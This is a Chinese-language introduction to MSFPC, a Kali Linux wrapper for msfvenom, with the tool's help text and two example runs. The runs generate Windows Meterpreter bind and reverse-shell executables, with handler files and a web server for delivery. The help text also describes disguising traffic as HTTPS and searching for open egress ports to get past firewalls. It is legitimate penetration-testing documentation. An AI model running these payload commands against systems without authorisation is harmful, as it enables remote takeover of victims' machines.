MSFPC 介绍

MSFvenom载荷创造者(MSFPC)是一个包装器生成多种类型的有效载荷,根据用户选择的选项。这个想法是为了尽可能简单(使用只有一个选项)产生一个负载。

完全自动化msfvenom & Metasploit最终目标(也可以自动化MSFPC本身)。其余的是让用户的生活尽可能容易(例如IP选择菜单,msfconsole资源文件/命令,批量生产负载,能够以任意顺序输入任何参数(以各种格式/模式))。

作者: g0tmi1k
证书: MIT(Massachu-setts Institute of Technology)

工具来源
Kali msfpc Repo 仓库

msfpc — Msfvenom 模板生成(MPC)

root@kali:~# msfpc -h
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 /usr/bin/msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

Example:
/usr/bin/msfpc windows 192.168.1.10        # Windows & manual IP.
/usr/bin/msfpc elf bind eth0 4444          # Linux, eth0's IP & manual port.
/usr/bin/msfpc stageless cmd py https      # Python, stageless command prompt.
/usr/bin/msfpc verbose loop eth1         # A payload for every type, using eth1's IP.
/usr/bin/msfpc msf batch wan       # All possible Meterpreter payloads, using WAN IP.
/usr/bin/msfpc help verbose                # Help screen, with even more information.

 <TYPE>:
   + APK
   + ASP
   + ASPX
   + Bash [.sh]
   + Java [.jsp]
   + Linux [.elf]
   + OSX [.macho]
   + Perl [.pl]
   + PHP
   + Powershell [.ps1]
   + Python [.py]
   + Tomcat [.war]
   + Windows [.exe // .dll]

 Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
 Missing <DOMAIN/IP> will default to the IP menu.

 Missing <PORT> will default to 443.

 <CMD> is a standard/native command prompt/terminal to interactive with.
 <MSF> is a custom cross platform shell, gaining the full power of Metasploit.
 Missing <CMD/MSF> will default to <MSF> where possible.

 <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
 <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 Missing <BIND/REVERSE> will default to <REVERSE>.

 <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
 <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
 Missing <STAGED/STAGELESS> will default to <STAGED> where possible.

 <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
 <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
 <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
 <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
 Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.

 <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
 <LOOP> will just create one of each <TYPE>.

 <VERBOSE> will display more information。

msfpc 用法示例

Semi-interactively 创建一个windows Meterpreter 绑定在5555端口上。

root@kali:~# msfpc windows bind 5555 verbose
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 [i] Use which interface - IP address?:
 [i]   1.) lo - 127.0.0.1
 [i]   2.) eth0 - 172.16.193.160
 [i]   3.) wan - 68.151.240.61
 [?] Select 1-3, interface or IP address: 2

 [i]        IP: 172.16.193.160
 [i]      PORT: 5555
 [i]      TYPE: windows (windows/meterpreter/bind_tcp)
 [i]     SHELL: meterpreter
 [i] DIRECTION: bind
 [i]     STAGE: staged
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p windows/meterpreter/bind_tcp -f exe \
  --platform windows -a x86 -e generic/none  LPORT=5555 \
  > '/root/windows-meterpreter-staged-bind-tcp-5555.exe'

 [i] windows meterpreter created: '/root/windows-meterpreter-staged-bind-tcp-5555.exe'

 [i] File: PE32 executable (GUI) Intel 80386, for MS Windows
 [i] Size: 76K
 [i]  MD5: 5bdb434e053fa0a9894eb88720c09e2a
 [i] SHA1: 9d51c45c76dfd947994cb4be61f5f9797b35167f

 [i] MSF handler file: '/root/windows-meterpreter-staged-bind-tcp-5555-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-bind-tcp-5555-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!

自动生成一个Windows反向Meterpreter负载,使用的IP地址与LHOST eth0接口参数。

root@kali:~# msfpc windows eth0
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: 172.16.193.160
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=172.16.193.160 LPORT=443 \
  > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!